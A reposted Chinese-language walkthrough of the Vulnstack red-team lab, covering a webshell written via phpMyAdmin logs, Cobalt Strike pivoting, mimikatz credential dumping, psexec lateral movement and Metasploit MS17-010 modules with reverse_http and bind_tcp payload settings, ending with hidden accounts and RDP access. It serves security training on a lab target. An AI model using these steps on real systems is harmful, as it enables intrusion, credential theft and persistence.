滲透實戰之目標不出網打法


Vulnstack 紅隊(一)

靶機為紅日安全分享的靶機
靶機下載地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

網絡拓展圖

 

0x01 CS打法

WEB外網機信息收集

端口信息

 

 80端口開放(HTTP) ,3306開放(MYSQL)

 訪問WEB服務返回phpStudy探針 root root弱口令嘗試登錄MYSQL成功

 

 掃一波目錄 出現phpmyadmin

登錄phpmyadmin通過日志文件寫入一句話木馬

 

 

 

 

 菜刀連接

我是誰

 

 我在哪

 

 

 

 存在域god.org 並且有兩張網卡,192.168.43.1/24是攻擊機與WEB模擬的外網網卡,另外還有一張192.168.52.1/24網卡

tasklist /svc查看進程 對比有無殺軟

 

 

 

 對比無殺軟

上線CS && net view

 

還有WEB外網機的內網IP域成員 192.168.52.143,192.168.52.138為域控,192.168.52.141為域成員

hashdump抓hash密碼

 

 mimikatz抓明文密碼

 

 中轉beacon 監聽IP為WEB服務器 域內網卡IP192.168.52.143就可以跟域內主機通信

 

 portscan掃一波192.168.52.0/24段

 

 查看抓到的憑證

 

 查看目標

 

 最下面那條為WEB外網機

psexec在192.168.52.138上登錄域管憑證

 

 

 

 再登錄192.168.52.141

 

 

 

 ipconfig /all查看192.168.52.138的網卡

 

 只有一張192.168.52.0/24內網網卡

ipconfig /all查看192.168.52.141的網卡

 

 也只有一張內網網卡

0x02 MSF MS17-010打法

目標處查看域內另外兩台主機的開放端口

 

 

 

 

 

 發現都開放了SMB 445端口

此時可以CS派生shell到MSF打MS17-010

CS添加外部監聽器

 

 

 

 

 

 派生到Beacon

use multi/handler調用監聽模塊 && set payload windows/meterpreter/reverse_http 設置HTTP監聽模塊 && set LHOST 192.168.43.128設置監聽IP && set LPORT 666監聽端口 && run/exploit

 

返回msfShell meterpreter會話

 

 run post/multi/manage/autoroute自動添加路由

 

background把session放到后台 && use auxiliary/scanner/smb/smb_ms17_010 調用ms17-010掃描模塊 掃描開放445端口的主機

 

 

 

 

 use exploit/windows/smb/ms17_010_eternalblue調用ms17010漏洞利用模塊

目標出網時反向打:set payload windows/x64/meterpreter/reverse_tcp

目標不出網時正向打(如添加了路由):set payload windows/x64/meterpreter/bind_tcp

這里不出網所以set payload windows/x64/meterpreter/bind_tcp

 

 執行完成,但沒返回session

 換一台試試

 

 也一樣,可能存在ms17010漏洞,但不返回session,我們換個打法,use auxiliary/admin/smb/ms17_010_command模塊直接執行命令看看

 

 都能遠程執行命令,並且都是system權限,可以添加影子賬戶,再開3389端口,做隧道連接登錄,后面就自行發揮了

打完收工·.·


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM